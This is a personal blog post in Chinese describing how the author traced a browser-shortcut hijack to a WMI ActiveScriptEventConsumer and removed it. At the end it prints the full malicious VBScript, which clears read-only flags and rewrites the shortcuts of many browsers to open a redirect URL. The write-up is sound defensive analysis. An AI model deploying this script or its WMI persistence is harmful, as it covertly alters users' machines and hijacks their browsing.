瀏覽器快捷方式被篡改
瀏覽器快捷方式被流氓不定時調戲腫麼辦
自從上次花了一晚上幫曉英弄史上最臃腫資料庫#Oracle database#而錯過星戰零點場後,我就一直嚷嚷著要開始寫部落格備忘,一直以為第一篇部落格會是《Spark原始碼走心解讀》《你真的懂Hadoop嗎》神馬的,萬萬沒想到會是這個….
em,前幾天下了個小遊戲(一點都不好玩),然後就發現所有瀏覽器開啟時都會跳轉到http://so.wnoyng.cn/?r=x,並不是簡單地修改登錄檔,而是不定時地修改啟動欄上的瀏覽器快捷方式的目標,新增辣雞連結。
真的是不定時啊,據我這兩天的觀察,lnk被修改的時間包括但不侷限於7:51,13:25,19:51,20;36……..
那其實把快捷方式改成只讀就好了,但是這個小流氓一直在我電腦裡我就很不開心啊,於是我就用ProcessMonitor來監控程序(BTW,filter可以設為 Path ends with lnk),可是這個碧池好像知道我在監控似的,一直不出來作案,有天晚上掛著ProcMon,結果第二天起來記憶體爆了…
但好在我是一個#老闆還沒來#的#單身狗#,於是就一邊看#真田丸(好看好看好看),一邊掛著ProcMon,每一個小時清一下log,最後終於抓住了:scrcons.exe….但這TM是系統程序啊,我不能瞎比刪啊。
感謝http://bbs.csdn.net/topics/390272533?page=1
em,說的好像很有道理,但是我並不懂…
反正就是一個通過WMI發起的定時自動執行指令碼,(不過真的是定時的嗎?)…
安裝後開啟wbemeventviewer,點選左上角register for events,彈出Connect to namespace框,填入“root\CIMV2”,確定,出現下圖:
這個叫“VBScriptKids_consumer”的指令碼(學名:ActiveScriptEventConsumer)就是我們要找的流氓,右鍵刪除應該就能解決了吧?!…..
哦,不要忘了把被調戲的快捷方式改回去,具體哪些快捷方式被侮辱了可以看下面的ScriptText..
最後貼一下具體的指令碼程式碼,有興趣的可以參考參考:
On Error Resume Next:Const link = "http://so.wnoyng.cn/?r=x":Const link360 = "http://so.wnoyng.cn/?r=x&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Simon\Desktop,C:\Users\Simon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Simon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Simon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next: